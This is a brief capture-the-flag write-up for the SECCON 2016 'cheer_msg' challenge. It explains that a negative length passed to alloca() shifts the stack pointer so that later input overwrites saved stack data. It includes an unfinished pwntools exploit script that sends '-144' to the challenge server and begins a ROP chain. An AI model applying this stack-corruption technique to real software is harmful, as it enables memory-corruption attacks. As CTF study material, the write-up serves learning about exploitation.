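SECCON 2016 cheer_msg

요약: alloca 에 음수줘서 stack 해꼬질함.
summary: pass a negative length to alloca() and fuck up the stack. With a negative length, alloca() moves the stack pointer up instead of down, so the Name input read afterwards can land on saved stack data, which is why the script goes on to build a ROP chain. The root cause is that the message length reaches alloca() without a range check.

```python
from pwn import *
context.arch = 'i386'
# i386 / arm
# recvuntil sendline, pack, recv, send
r = remote('cheermsg.pwn.seccon.jp', 30527)
#r = process(['./cheer_msg'])
raw_input('attach')
# start pwn.
print r.recvuntil('Message Length >> ')
r.sendline('-144')
print r.recvuntil('Name >> ')
# ROP start!
pr = 0x80487af
got =..
```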